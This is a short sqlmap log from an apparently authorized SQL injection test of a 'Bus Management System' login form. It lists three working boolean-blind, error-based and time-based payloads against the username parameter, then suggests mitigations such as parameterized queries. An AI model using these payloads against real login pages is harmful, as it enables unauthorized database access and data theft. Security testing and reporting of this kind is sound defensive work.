Sanitized log from ethical SQL injection testing in a controlled environment using sqlmap.
sqlmap identified the following injection point(s) with a total of 132 HTTP(s) requests:
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: username=sdfg' OR NOT 1458=1458#&password=sdfgdfg&login=Login
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=sdfg' AND (SELECT 4580 FROM(SELECT COUNT(*),CONCAT(0x7162787871,(SELECT (ELT(4580=4580,1))),0x7176767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Xqpe&password=sdfgdfg&login=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=sdfg' AND (SELECT 2133 FROM (SELECT(SLEEP(5)))DXdG)-- KAgy&password=sdfgdfg&login=Login
---
web application technology: PHP 8.2.12, Apache 2.4.58
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
---
Test Environment: Bus Management System
Test Date: 2025-03-10
Mitigations Suggested:
- Use parameterized queries and prepared statements
- Implement input validation and sanitization
- Suppress detailed error messages
- Use ORM frameworks for database interactions